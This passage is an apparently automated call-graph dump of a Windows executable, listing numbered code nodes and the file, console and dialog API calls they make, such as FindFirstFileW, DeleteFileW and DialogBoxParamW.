API calls 24043->24045 24048 cbb10d __InternalCxxFrameHandler ___std_exception_copy 24044->24048 24046 cbb0e4 24045->24046 24046->23823 24046->23828 24047 ca1692 86 API calls 24047->24046 24048->24047 24049->23803 24051 cbb568 5 API calls 24050->24051 24052 cbd4e0 GetDlgItem 24051->24052 24053 cbd502 24052->24053 24054 cbd536 SendMessageW SendMessageW 24052->24054 24057 cbd50d ShowWindow SendMessageW SendMessageW 24053->24057 24055 cbd572 24054->24055 24056 cbd591 SendMessageW SendMessageW SendMessageW 24054->24056 24055->24056 24058 cbd5e7 SendMessageW 24056->24058 24059 cbd5c4 SendMessageW 24056->24059 24057->24054 24058->23827 24059->24058 24060->23884 24061->23912 24062->23917 24063->23922 24064->23928 24065->23935 24066->23871 24067->23883 24068->23856 24069->23844 24070->23943 24071->23941 24073 caa2bf 24072->24073 24074 caa2e3 24073->24074 24075 caa2d6 CreateDirectoryW 24073->24075 24076 caa231 3 API calls 24074->24076 24075->24074 24077 caa316 24075->24077 24078 caa2e9 24076->24078 24079 caa325 24077->24079 24085 caa4ed 24077->24085 24080 caa329 GetLastError 24078->24080 24081 cabb03 GetCurrentDirectoryW 24078->24081 24079->23950 24080->24079 24083 caa2ff 24081->24083 24083->24080 24084 caa303 CreateDirectoryW 24083->24084 24084->24077 24084->24080 24086 cbec50 24085->24086 24087 caa4fa SetFileAttributesW 24086->24087 24088 caa53d 24087->24088 24089 caa510 24087->24089 24088->24079 24090 cabb03 GetCurrentDirectoryW 24089->24090 24091 caa524 24090->24091 24091->24088 24092 caa528 SetFileAttributesW 24091->24092 24092->24088 24094 ca9781 24093->24094 24095 ca9757 24093->24095 24094->23964 24095->24094 24104 caa1e0 24095->24104 24099 ca964a 24098->24099 24100 ca962c 24098->24100 24101 ca9669 24099->24101 24112 ca6bd5 76 API calls 24099->24112 24100->24099 24102 ca9638 CloseHandle 24100->24102 24101->23964 24102->24099 24105 cbec50 24104->24105 24106 caa1ed DeleteFileW 24105->24106 24107 ca977f 24106->24107 24108 caa200 24106->24108 24107->23964 24109 cabb03 GetCurrentDirectoryW 24108->24109 24110 caa214 24109->24110 24110->24107 24111 caa218 DeleteFileW 24110->24111 24111->24107 24112->24101 24113->23983 24114->23983 24115->23987 24116->23983 24117->23983 24118->23983 24120 cb0666 _wcslen 24119->24120 24147 ca17e9 24120->24147 24122 cb067e 24122->24000 24124 cb0659 _wcslen 24123->24124 24125 ca17e9 78 API calls 24124->24125 24126 cb067e 24125->24126 24126->24002 24128 ca7b17 __EH_prolog 24127->24128 24164 cace40 24128->24164 24130 ca7b32 24170 cbeb38 24130->24170 24132 ca7b5c 24179 cb4a76 24132->24179 24135 ca7c7d 24136 ca7c87 24135->24136 24138 ca7cf1 24136->24138 24211 caa56d 24136->24211 24140 ca7d50 24138->24140 24189 ca8284 24138->24189 24139 ca7d92 24139->24006 24140->24139 24217 ca138b 74 API calls 24140->24217 24144 ca7bac 24143->24144 24145 ca7bb3 24143->24145 24146 cb2297 86 API calls 24144->24146 24146->24145 24148 ca17ff 24147->24148 24159 ca185a __InternalCxxFrameHandler 24147->24159 24149 ca1828 24148->24149 24160 ca6c36 76 API calls __vswprintf_c_l 24148->24160 24151 ca1887 24149->24151 24152 ca1847 ___std_exception_copy 24149->24152 24154 cc3e3e 22 API calls 24151->24154 24152->24159 24162 ca6ca7 75 API calls 24152->24162 24153 ca181e 24161 ca6ca7 75 API calls 24153->24161 24156 ca188e 24154->24156 24156->24159 24163 ca6ca7 75 API calls 24156->24163 24159->24122 24160->24153 24161->24149 24162->24159 24163->24159 24165 cace4a __EH_prolog 24164->24165 24166 cbeb38 8 API calls 24165->24166 24167 cace8d 24166->24167 24168 cbeb38 8 API calls 24167->24168 24169 caceb1 24168->24169 24169->24130 24171 cbeb3d ___std_exception_copy 24170->24171 24172 cbeb57 24171->24172 24175 cbeb59 24171->24175 24185 cc7a5e 7 API calls 2 library calls 24171->24185 24172->24132 24174 cbf5c9 24187 cc238d RaiseException 24174->24187 24175->24174 24186 cc238d RaiseException 24175->24186 24178 cbf5e6 24180 cb4a80 __EH_prolog 24179->24180 24181 cbeb38 8 API calls 24180->24181 24182 cb4a9c 24181->24182 24183 ca7b8b 24182->24183 24188 cb0e46 80 API calls 24182->24188 24183->24135 24185->24171 24186->24174 24187->24178 24188->24183 24190 ca828e __EH_prolog 24189->24190 24218 ca13dc 24190->24218 24192 ca82aa 24194 ca82bb 24192->24194 24361 ca9f42 24192->24361 24196 ca82f2 24194->24196 24226 ca1a04 24194->24226 24357 ca1692 24196->24357 24199 ca8389 24245 ca8430 24199->24245 24202 ca83e8 24253 ca1f6d 24202->24253 24204 ca82ee 24204->24196 24204->24199 24209 caa56d 7 API calls 24204->24209 24365 cac0c5 CompareStringW _wcslen 24204->24365 24207 ca83f3 24207->24196 24257 ca3b2d 24207->24257 24269 ca848e 24207->24269 24209->24204 24212 caa582 24211->24212 24213 caa5b0 24212->24213 24624 caa69b 24212->24624 24213->24136 24215 caa592 24215->24213 24216 caa597 FindClose 24215->24216 24216->24213 24217->24139 24219 ca13e1 __EH_prolog 24218->24219 24220 cace40 8 API calls 24219->24220 24221 ca1419 24220->24221 24222 cbeb38 8 API calls 24221->24222 24225 ca1474 _abort 24221->24225 24223 ca1461 24222->24223 24224 cab505 84 API calls 24223->24224 24223->24225 24224->24225 24225->24192 24227 ca1a0e __EH_prolog 24226->24227 24239 ca1a61 24227->24239 24241 ca1b9b 24227->24241 24366 ca13ba 24227->24366 24229 ca1bc7 24378 ca138b 74 API calls 24229->24378 24232 ca3b2d 101 API calls 24235 ca1c12 24232->24235 24233 ca1bd4 24233->24232 24233->24241 24234 ca1c5a 24238 ca1c8d 24234->24238 24234->24241 24379 ca138b 74 API calls 24234->24379 24235->24234 24237 ca3b2d 101 API calls 24235->24237 24237->24235 24238->24241 24243 ca9e80 79 API calls 24238->24243 24239->24229 24239->24233 24239->24241 24240 ca3b2d 101 API calls 24242 ca1cde 24240->24242 24241->24204 24242->24240 24242->24241 24243->24242 24399 cacf3d 24245->24399 24247 ca8440 24403 cb13d2 GetSystemTime SystemTimeToFileTime 24247->24403 24249 ca83a3 24249->24202 24250 cb1b66 24249->24250 24408 cbde6b 24250->24408 24254 ca1f72 __EH_prolog 24253->24254 24256 ca1fa6 24254->24256 24416 ca19af 24254->24416 24256->24207 24258 ca3b39 24257->24258 24259 ca3b3d 24257->24259 24258->24207 24268 ca9e80 79 API calls 24259->24268 24260 ca3b4f 24261 ca3b6a 24260->24261 24262 ca3b78 24260->24262 24267 ca3baa 24261->24267 24546 ca32f7 89 API calls 2 library calls 24261->24546 24547 ca286b 101 API calls 3 library calls 24262->24547 24265 ca3b76 24265->24267 24548 ca20d7 74 API calls 24265->24548 24267->24207 24268->24260 24270 ca8498 __EH_prolog 24269->24270 24275 ca84d5 24270->24275 24284 ca8513 24270->24284 24573 cb8c8d 103 API calls 24270->24573 24271 ca84f5 24273 ca84fa 24271->24273 24274 ca851c 24271->24274 24273->24284 24574 ca7a0d 152 API calls 24273->24574 24274->24284 24575 cb8c8d 103 API calls 24274->24575 24275->24271 24276 ca857a 24275->24276 24275->24284 24276->24284 24549 ca5d1a 24276->24549 24280 ca8605 24280->24284 24555 ca8167 24280->24555 24283 ca8797 24285 caa56d 7 API calls 24283->24285 24286 ca8802 24283->24286 24284->24207 24285->24286 24561 ca7c0d 24286->24561 24288 cad051 82 API calls 24294 ca885d 24288->24294 24289 ca898b 24578 ca2021 74 API calls 24289->24578 24290 ca8a5f 24295 ca8ab6 24290->24295 24309 ca8a6a 24290->24309 24291 ca8992 24291->24290 24298 ca89e1 24291->24298 24294->24284 24294->24288 24294->24289 24294->24291 24576 ca8117 84 API calls 24294->24576 24577 ca2021 74 API calls 24294->24577 24301 ca8a4c 24295->24301 24581 ca7fc0 97 API calls 24295->24581 24296 ca8b14 24316 ca8b82 24296->24316 24346 ca9105 24296->24346 24582 ca98bc 24296->24582 24297 ca8ab4 24302 ca959a 80 API calls 24297->24302 24298->24296 24298->24301 24303 caa231 3 API calls 24298->24303 24300 ca959a 80 API calls 24300->24284 24301->24296 24301->24297 24302->24284 24304 ca8a19 24303->24304 24304->24301 24579 ca92a3 97 API calls 24304->24579 24305 caab1a 8 API calls 24307 ca8bd1 24305->24307 24311 caab1a 8 API calls 24307->24311 24309->24297 24580 ca7db2 101 API calls 24309->24580 24327 ca8be7 24311->24327 24314 ca8b70 24586 ca6e98 77 API calls 24314->24586 24316->24305 24317 ca8d18 24320 ca8d8a 24317->24320 24321 ca8d28 24317->24321 24318 ca8e40 24322 ca8e52 24318->24322 24323 ca8e66 24318->24323 24341 ca8d49 24318->24341 24319 ca8cbc 24319->24317 24319->24318 24329 ca8167 19 API calls 24320->24329 24324 ca8d6e 24321->24324 24334 ca8d37 24321->24334 24325 ca9215 123 API calls 24322->24325 24326 cb3377 75 API calls 24323->24326 24324->24341 24589 ca77b8 111 API calls 24324->24589 24325->24341 24330 ca8e7f 24326->24330 24327->24319 24328 ca8c93 24327->24328 24336 ca981a 79 API calls 24327->24336 24328->24319 24587 ca9a3c 82 API calls 24328->24587 24333 ca8dbd 24329->24333 24592 cb3020 123 API calls 24330->24592 24339 ca8de6 24333->24339 24340 ca8df5 24333->24340 24333->24341 24588 ca2021 74 API calls 24334->24588 24336->24328 24338 ca8f85 24345 ca9090 24338->24345 24338->24346 24347 ca903e 24338->24347 24567 ca9f09 SetEndOfFile 24338->24567 24590 ca7542 85 API calls 24339->24590 24591 ca9155 93 API calls __EH_prolog 24340->24591 24341->24338 24593 ca2021 74 API calls 24341->24593 24345->24346 24348 caa4ed 3 API calls 24345->24348 24346->24300 24568 ca9da2 24347->24568 24349 ca90eb 24348->24349 24349->24346 24594 ca2021 74 API calls 24349->24594 24352 ca9085 24354 ca9620 77 API calls 24352->24354 24354->24345 24355 ca90fb 24595 ca6dcb 76 API calls 24355->24595 24358 ca16a4 24357->24358 24611 cacee1 24358->24611 24362 ca9f59 24361->24362 24363 ca9f63 24362->24363 24623 ca6d0c 78 API calls 24362->24623 24363->24194 24365->24204 24380 ca1732 24366->24380 24368 ca13d6 24369 ca9e80 24368->24369 24370 ca9e92 24369->24370 24371 ca9ea5 24369->24371 24372 ca9eb0 24370->24372 24397 ca6d5b 77 API calls 24370->24397 24371->24372 24374 ca9eb8 SetFilePointer 24371->24374 24372->24239 24374->24372 24375 ca9ed4 GetLastError 24374->24375 24375->24372 24376 ca9ede 24375->24376 24376->24372 24398 ca6d5b 77 API calls 24376->24398 24378->24241 24379->24238 24381 ca1748 24380->24381 24392 ca17a0 __InternalCxxFrameHandler 24380->24392 24382 ca1771 24381->24382 24393 ca6c36 76 API calls __vswprintf_c_l 24381->24393 24384 ca17c7 24382->24384 24387 ca178d ___std_exception_copy 24382->24387 24386 cc3e3e 22 API calls 24384->24386 24385 ca1767 24394 ca6ca7 75 API calls 24385->24394 24389 ca17ce 24386->24389 24387->24392 24395 ca6ca7 75 API calls 24387->24395 24389->24392 24396 ca6ca7 75 API calls 24389->24396 24392->24368 24393->24385 24394->24382 24395->24392 24396->24392 24397->24371 24398->24372 24400 cacf54 24399->24400 24401 cacf4d 24399->24401 24400->24247 24404 ca981a 24401->24404 24403->24249 24405 ca9833 24404->24405 24407 ca9e80 79 API calls 24405->24407 24406 ca9865 24406->24400 24407->24406 24409 cbde78 24408->24409 24410 cae617 53 API calls 24409->24410 24411 cbde9b 24410->24411 24412 ca4092 _swprintf 51 API calls 24411->24412 24413 cbdead 24412->24413 24414 cbd4d4 16 API calls 24413->24414 24415 cb1b7c 24414->24415 24415->24202 24417 ca19bf 24416->24417 24419 ca19bb 24416->24419 24420 ca18f6 24417->24420 24419->24256 24421 ca1908 24420->24421 24422 ca1945 24420->24422 24423 ca3b2d 101 API calls 24421->24423 24428 ca3fa3 24422->24428 24426 ca1928 24423->24426 24426->24419 24432 ca3fac 24428->24432 24429 ca3b2d 101 API calls 24429->24432 24430 ca1966 24430->24426 24433 ca1e50 24430->24433 24432->24429 24432->24430 24445 cb0e08 24432->24445 24434 ca1e5a __EH_prolog 24433->24434 24453 ca3bba 24434->24453 24436 ca1e84 24437 ca1732 78 API calls 24436->24437 24444 ca1f0b 24436->24444 24438 ca1e9b 24437->24438 24481 ca18a9 78 API calls 24438->24481 24440 ca1eb3 24442 ca1ebf _wcslen 24440->24442 24482 cb1b84 MultiByteToWideChar 24440->24482 24483 ca18a9 78 API calls 24442->24483 24444->24426 24446 cb0e0f 24445->24446 24447 cb0e2a 24446->24447 24451 ca6c31 RaiseException _com_raise_error 24446->24451 24449 cb0e3b SetThreadExecutionState 24447->24449 24452 ca6c31 RaiseException _com_raise_error 24447->24452 24449->24432 24451->24447 24452->24449 24454 ca3bc4 __EH_prolog 24453->24454 24455 ca3bda 24454->24455 24456 ca3bf6 24454->24456 24509 ca138b 74 API calls 24455->24509 24458 ca3e51 24456->24458 24461 ca3c22 24456->24461 24526 ca138b 74 API calls 24458->24526 24460 ca3be5 24460->24436 24461->24460 24484 cb3377 24461->24484 24463 ca3ca3 24464 ca3d2e 24463->24464 24474 ca3c9a 24463->24474 24512 cad051 24463->24512 24494 caab1a 24464->24494 24465 ca3c9f 24465->24463 24511 ca20bd 78 API calls 24465->24511 24467 ca3c8f 24510 ca138b 74 API calls 24467->24510 24468 ca3c71 24468->24463 24468->24465 24468->24467 24470 ca3d41 24475 ca3dd7 24470->24475 24476 ca3dc7 24470->24476 24520 cb2297 24474->24520 24518 cb3020 123 API calls 24475->24518 24498 ca9215 24476->24498 24479 ca3dd5 24479->24474 24519 ca2021 74 API calls 24479->24519 24481->24440 24482->24442 24483->24444 24485 cb338c 24484->24485 24487 cb3396 ___std_exception_copy 24484->24487 24527 ca6ca7 75 API calls 24485->24527 24488 cb341c 24487->24488 24489 cb34c6 24487->24489 24493 cb3440 _abort 24487->24493 24528 cb32aa 75 API calls 3 library calls 24488->24528 24529 cc238d RaiseException 24489->24529 24492 cb34f2 24493->24468 24495 caab28 24494->24495 24497 caab32 24494->24497 24496 cbeb38 8 API calls 24495->24496 24496->24497 24497->24470 24499 ca921f __EH_prolog 24498->24499 24530 ca7c64 24499->24530 24502 ca13ba 78 API calls 24503 ca9231 24502->24503 24533 cad114 24503->24533 24505 ca928a 24505->24479 24506 cad114 118 API calls 24508 ca9243 24506->24508 24508->24505 24508->24506 24542 cad300 97 API calls __InternalCxxFrameHandler 24508->24542 24509->24460 24510->24474 24511->24463 24513 cad072 24512->24513 24514 cad084 24512->24514 24543 ca603a 82 API calls 24513->24543 24544 ca603a 82 API calls 24514->24544 24517 cad07c 24517->24464 24518->24479 24519->24474 24521 cb22a1 24520->24521 24522 cb22ba 24521->24522 24525 cb22ce 24521->24525 24545 cb0eed 86 API calls 24522->24545 24524 cb22c1 24524->24525 24526->24460 24527->24487 24528->24493 24529->24492 24531 cab146 GetVersionExW 24530->24531 24532 ca7c69 24531->24532 24532->24502 24539 cad12a __InternalCxxFrameHandler 24533->24539 24534 cad29a 24535 cad0cb 6 API calls 24534->24535 24536 cad2ce 24534->24536 24535->24536 24537 cb0e08 SetThreadExecutionState RaiseException 24536->24537 24540 cad291 24537->24540 24538 cb8c8d 103 API calls 24538->24539 24539->24534 24539->24538 24539->24540 24541 caac05 91 API calls 24539->24541 24540->24508 24541->24539 24542->24508 24543->24517 24544->24517 24545->24524 24546->24265 24547->24265 24548->24267 24550 ca5d2a 24549->24550 24596 ca5c4b 24550->24596 24553 ca5d5d 24554 ca5d95 24553->24554 24601 cab1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 24553->24601 24554->24280 24556 ca8186 24555->24556 24557 ca8232 24556->24557 24608 cabe5e 19 API calls __InternalCxxFrameHandler 24556->24608 24607 cb1fac CharUpperW 24557->24607 24560 ca823b 24560->24283 24562 ca7c22 24561->24562 24563 ca7c5a 24562->24563 24609 ca6e7a 74 API calls 24562->24609 24563->24294 24565 ca7c52 24610 ca138b 74 API calls 24565->24610 24567->24347 24569 ca9db3 24568->24569 24571 ca9dc2 24568->24571 24570 ca9db9 FlushFileBuffers 24569->24570 24569->24571 24570->24571 24572 ca9e3f SetFileTime 24571->24572 24572->24352 24573->24275 24574->24284 24575->24284 24576->24294 24577->24294 24578->24291 24579->24301 24580->24297 24581->24301 24583 ca8b5a 24582->24583 24584 ca98c5 GetFileType 24582->24584 24583->24316 24585 ca2021 74 API calls 24583->24585 24584->24583 24585->24314 24586->24316 24587->24319 24588->24341 24589->24341 24590->24341 24591->24341 24592->24341 24593->24338 24594->24355 24595->24346 24602 ca5b48 24596->24602 24598 ca5c6c 24598->24553 24600 ca5b48 2 API calls 24600->24598 24601->24553 24604 ca5b52 24602->24604 24603 ca5c3a 24603->24598 24603->24600 24604->24603 24606 cab1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsGetValue 24604->24606 24606->24604 24607->24560 24608->24557 24609->24565 24610->24563 24612 cacef2 24611->24612 24617 caa99e 24612->24617 24614 cacf24 24615 caa99e 86 API calls 24614->24615 24616 cacf2f 24615->24616 24618 caa9c1 24617->24618 24621 caa9d5 24617->24621 24622 cb0eed 86 API calls 24618->24622 24620 caa9c8 24620->24621 24621->24614 24622->24620 24623->24363 24625 caa6a8 24624->24625 24626 caa6c1 FindFirstFileW 24625->24626 24627 caa727 FindNextFileW 24625->24627 24628 caa6d0 24626->24628 24634 caa709 24626->24634 24629 caa732 GetLastError 24627->24629 24627->24634 24630 cabb03 GetCurrentDirectoryW 24628->24630 24629->24634 24631 caa6e0 24630->24631 24632 caa6fe GetLastError 24631->24632 24633 caa6e4 FindFirstFileW 24631->24633 24632->24634 24633->24632 24633->24634 24634->24215 24644 cba5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24635->24644 24637 cba5cd 24638 cba5d9 24637->24638 24645 cba605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24637->24645 24638->24013 24638->24014 24640->24017 24641->24024 24642->24024 24643->24026 24644->24637 24645->24638 24646->24034 24648 ca9f42 78 API calls 24647->24648 24649 ca1fe8 24648->24649 24650 ca1a04 101 API calls 24649->24650 24653 ca2005 24649->24653 24651 ca1ff5 24650->24651 24651->24653 24654 ca138b 74 API calls 24651->24654 24653->24042 24653->24043 24654->24653 24655 ca13e1 84 API calls 2 library calls 25374 cb94e0 GetClientRect 25411 cb21e0 26 API calls std::bad_exception::bad_exception 25438 cbf2e0 46 API calls __RTC_Initialize 24656 cbeae7 24657 cbeaf1 24656->24657 24658 cbe85d ___delayLoadHelper2@8 14 API calls 24657->24658 24659 cbeafe 24658->24659 25375 cbf4e7 29 API calls _abort 25439 ccbee0 GetCommandLineA GetCommandLineW 25376 cc2cfb 38 API calls 4 library calls 25412 ca95f0 80 API calls 25413 cbfd4f 9 API calls 2 library calls 25440 ca5ef0 82 API calls 24676 cc98f0 24684 ccadaf 24676->24684 24679 cc9904 24681 cc990c 24682 cc9919 24681->24682 24692 cc9920 11 API calls 24681->24692 24693 ccac98 24684->24693 24687 ccadee TlsAlloc 24688 ccaddf 24687->24688 24689 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24688->24689 24690 cc98fa 24689->24690 24690->24679 24691 cc9869 20 API calls 2 library calls 24690->24691 24691->24681 24692->24679 24694 ccacc8 24693->24694 24698 ccacc4 24693->24698 24694->24687 24694->24688 24695 ccace8 24695->24694 24697 ccacf4 GetProcAddress 24695->24697 24699 ccad04 _abort 24697->24699 24698->24694 24698->24695 24700 ccad34 24698->24700 24699->24694 24701 ccad55 LoadLibraryExW 24700->24701 24702 ccad4a 24700->24702 24703 ccad8a 24701->24703 24704 ccad72 GetLastError 24701->24704 24702->24698 24703->24702 24706 ccada1 FreeLibrary 24703->24706 24704->24703 24705 ccad7d LoadLibraryExW 24704->24705 24705->24703 24706->24702 24707 ccabf0 24708 ccabfb 24707->24708 24710 ccac24 24708->24710 24711 ccac20 24708->24711 24713 ccaf0a 24708->24713 24720 ccac50 DeleteCriticalSection 24710->24720 24714 ccac98 _abort 5 API calls 24713->24714 24715 ccaf31 24714->24715 24716 ccaf4f InitializeCriticalSectionAndSpinCount 24715->24716 24717 ccaf3a 24715->24717 24716->24717 24718 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24717->24718 24719 ccaf66 24718->24719 24719->24708 24720->24711 25377 cc88f0 7 API calls ___scrt_uninitialize_crt 25379 cbc793 97 API calls 4 library calls 25416 cbb18d 78 API calls 25417 cb9580 6 API calls 25441 cbc793 102 API calls 4 library calls 25381 ccb49d 6 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25457 ca6faa 111 API calls 3 library calls 25383 cbdca1 DialogBoxParamW 25458 cbf3a0 27 API calls 25385 cca4a0 71 API calls _free 25419 cbeda7 48 API calls _unexpected 25387 cd08a0 IsProcessorFeaturePresent 25459 cb1bbd GetCPInfo IsDBCSLeadByte 24755 cbf3b2 24756 cbf3be __FrameHandler3::FrameUnwindToState 24755->24756 24787 cbeed7 24756->24787 24758 cbf3c5 24759 cbf518 24758->24759 24762 cbf3ef 24758->24762 24860 cbf838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24759->24860 24761 cbf51f 24853 cc7f58 24761->24853 24773 cbf42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24762->24773 24798 cc8aed 24762->24798 24769 cbf40e 24771 cbf48f 24806 cbf953 GetStartupInfoW _abort 24771->24806 24773->24771 24856 cc7af4 38 API calls _abort 24773->24856 24774 cbf495 24807 cc8a3e 51 API calls 24774->24807 24777 cbf49d 24808 cbdf1e 24777->24808 24781 cbf4b1 24781->24761 24782 cbf4b5 24781->24782 24783 cbf4be 24782->24783 24858 cc7efb 28 API calls _abort 24782->24858 24859 cbf048 12 API calls ___scrt_uninitialize_crt 24783->24859 24786 cbf4c6 24786->24769 24788 cbeee0 24787->24788 24862 cbf654 IsProcessorFeaturePresent 24788->24862 24790 cbeeec 24863 cc2a5e 24790->24863 24792 cbeef1 24793 cbeef5 24792->24793 24871 cc8977 24792->24871 24793->24758 24796 cbef0c 24796->24758 24799 cc8b04 24798->24799 24800 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24799->24800 24801 cbf408 24800->24801 24801->24769 24802 cc8a91 24801->24802 24803 cc8ac0 24802->24803 24804 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24803->24804 24805 cc8ae9 24804->24805 24805->24773 24806->24774 24807->24777 24964 cb0863 24808->24964 24812 cbdf3d 25013 cbac16 24812->25013 24814 cbdf46 _abort 24815 cbdf59 GetCommandLineW 24814->24815 24816 cbdf68 24815->24816 24817 cbdfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24815->24817 25017 cbc5c4 24816->25017 24818 ca4092 _swprintf 51 API calls 24817->24818 24820 cbe04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24818->24820 25028 cbb6dd LoadBitmapW 24820->25028 24823 cbdfe0 25022 cbdbde 24823->25022 24824 cbdf76 OpenFileMappingW 24827 cbdf8f MapViewOfFile 24824->24827 24828 cbdfd6 CloseHandle 24824->24828 24830 cbdfcd UnmapViewOfFile 24827->24830 24831 cbdfa0 __InternalCxxFrameHandler 24827->24831 24828->24817 24830->24828 24834 cbdbde 2 API calls 24831->24834 24837 cbdfbc 24834->24837 24836 cb90b7 8 API calls 24838 cbe0aa DialogBoxParamW 24836->24838 24837->24830 24839 cbe0e4 24838->24839 24840 cbe0f6 Sleep 24839->24840 24841 cbe0fd 24839->24841 24840->24841 24846 cbe10b 24841->24846 25058 cbae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 24841->25058 24843 cbe12a DeleteObject 24844 cbe13f DeleteObject 24843->24844 24845 cbe146 24843->24845 24844->24845 24847 cbe189 24845->24847 24848 cbe177 24845->24848 24846->24843 25055 cbac7c 24847->25055 25059 cbdc3b 6 API calls 24848->25059 24851 cbe17d CloseHandle 24851->24847 24852 cbe1c3 24857 cbf993 GetModuleHandleW 24852->24857 25191 cc7cd5 24853->25191 24856->24771 24857->24781 24858->24783 24859->24786 24860->24761 24862->24790 24875 cc3b07 24863->24875 24867 cc2a7a 24867->24792 24868 cc2a6f 24868->24867 24889 cc3b43 DeleteCriticalSection 24868->24889 24870 cc2a67 24870->24792 24918 ccc05a 24871->24918 24874 cc2a7d 7 API calls 2 library calls 24874->24793 24876 cc3b10 24875->24876 24878 cc3b39 24876->24878 24879 cc2a63 24876->24879 24890 cc3d46 24876->24890 24895 cc3b43 DeleteCriticalSection 24878->24895 24879->24870 24881 cc2b8c 24879->24881 24911 cc3c57 24881->24911 24884 cc2ba1 24884->24868 24886 cc2baf 24887 cc2bbc 24886->24887 24917 cc2bbf 6 API calls ___vcrt_FlsFree 24886->24917 24887->24868 24889->24870 24896 cc3c0d 24890->24896 24893 cc3d7e InitializeCriticalSectionAndSpinCount 24894 cc3d69 24893->24894 24894->24876 24895->24879 24897 cc3c26 24896->24897 24898 cc3c4f 24896->24898 24897->24898 24903 cc3b72 24897->24903 24898->24893 24898->24894 24901 cc3c3b GetProcAddress 24901->24898 24902 cc3c49 24901->24902 24902->24898 24909 cc3b7e ___vcrt_FlsGetValue 24903->24909 24904 cc3bf3 24904->24898 24904->24901 24905 cc3b95 LoadLibraryExW 24906 cc3bfa 24905->24906 24907 cc3bb3 GetLastError 24905->24907 24906->24904 24908 cc3c02 FreeLibrary 24906->24908 24907->24909 24908->24904 24909->24904 24909->24905 24910 cc3bd5 LoadLibraryExW 24909->24910 24910->24906 24910->24909 24912 cc3c0d ___vcrt_FlsGetValue 5 API calls 24911->24912 24913 cc3c71 24912->24913 24914 cc3c8a TlsAlloc 24913->24914 24915 cc2b96 24913->24915 24915->24884 24916 cc3d08 6 API calls ___vcrt_FlsGetValue 24915->24916 24916->24886 24917->24884 24921 ccc077 24918->24921 24922 ccc073 24918->24922 24919 cbfbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24920 cbeefe 24919->24920 24920->24796 24920->24874 24921->24922 24924 cca6a0 24921->24924 24922->24919 24925 cca6ac __FrameHandler3::FrameUnwindToState 24924->24925 24936 ccac31 EnterCriticalSection 24925->24936 24927 cca6b3 24937 ccc528 24927->24937 24929 cca6c2 24935 cca6d1 24929->24935 24950 cca529 29 API calls 24929->24950 24932 cca6e2 _abort 24932->24921 24933 cca6cc 24951 cca5df GetStdHandle GetFileType 24933->24951 24952 cca6ed LeaveCriticalSection _abort 24935->24952 24936->24927 24938 ccc534 __FrameHandler3::FrameUnwindToState 24937->24938 24939 ccc558 24938->24939 24940 ccc541 24938->24940 24953 ccac31 EnterCriticalSection 24939->24953 24961 cc91a8 20 API calls _abort 24940->24961 24943 ccc546 24962 cc9087 26 API calls _abort 24943->24962 24945 ccc590 24963 ccc5b7 LeaveCriticalSection _abort 24945->24963 24946 ccc550 _abort 24946->24929 24947 ccc564 24947->24945 24954 ccc479 24947->24954 24950->24933 24951->24935 24952->24932 24953->24947 24955 ccb136 _abort 20 API calls 24954->24955 24957 ccc48b 24955->24957 24956 ccc498 24958 cc8dcc _free 20 API calls 24956->24958 24957->24956 24959 ccaf0a 11 API calls 24957->24959 24960 ccc4ea 24958->24960 24959->24957 24960->24947 24961->24943 24962->24946 24963->24946 24965 cbec50 24964->24965 24966 cb086d GetModuleHandleW 24965->24966 24967 cb0888 GetProcAddress 24966->24967 24968 cb08e7 24966->24968 24969 cb08b9 GetProcAddress 24967->24969 24970 cb08a1 24967->24970 24971 cb0c14 GetModuleFileNameW 24968->24971 25069 cc75fb 42 API calls 2 library calls 24968->25069 24972 cb08cb 24969->24972 24970->24969 24980 cb0c32 24971->24980 24972->24968 24974 cb0b54 24974->24971 24975 cb0b5f GetModuleFileNameW CreateFileW 24974->24975 24976 cb0c08 CloseHandle 24975->24976 24977 cb0b8f SetFilePointer 24975->24977 24976->24971 24977->24976 24978 cb0b9d ReadFile 24977->24978 24978->24976 24982 cb0bbb 24978->24982 24983 cb0c94 GetFileAttributesW 24980->24983 24985 cb0c5d CompareStringW 24980->24985 24986 cb0cac 24980->24986 25060 cab146 24980->25060 25063 cb081b 24980->25063 24982->24976 24984 cb081b 2 API calls 24982->24984 24983->24980 24983->24986 24984->24982 24985->24980 24987 cb0cb7 24986->24987 24990 cb0cec 24986->24990 24989 cb0cd0 GetFileAttributesW 24987->24989 24991 cb0ce8 24987->24991 24988 cb0dfb 25012 cba64d GetCurrentDirectoryW 24988->25012 24989->24987 24989->24991 24990->24988 24992 cab146 GetVersionExW 24990->24992 24991->24990 24993 cb0d06 24992->24993 24994 cb0d0d 24993->24994 24995 cb0d73 24993->24995 24997 cb081b 2 API calls 24994->24997 24996 ca4092 _swprintf 51 API calls 24995->24996 24998 cb0d9b AllocConsole 24996->24998 24999 cb0d17 24997->24999 25000 cb0da8 GetCurrentProcessId AttachConsole 24998->25000 25001 cb0df3 ExitProcess 24998->25001 25002 cb081b 2 API calls 24999->25002 25070 cc3e13 25000->25070 25004 cb0d21 25002->25004 25005 cae617 53 API calls 25004->25005 25007 cb0d3c 25005->25007 25006 cb0dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25006->25001 25008 ca4092 _swprintf 51 API calls 25007->25008 25009 cb0d4f 25008->25009 25010 cae617 53 API calls 25009->25010 25011 cb0d5e 25010->25011 25011->25001 25012->24812 25014 cb081b 2 API calls 25013->25014 25015 cbac2a OleInitialize 25014->25015 25016 cbac4d GdiplusStartup SHGetMalloc 25015->25016 25016->24814 25020 cbc5ce 25017->25020 25018 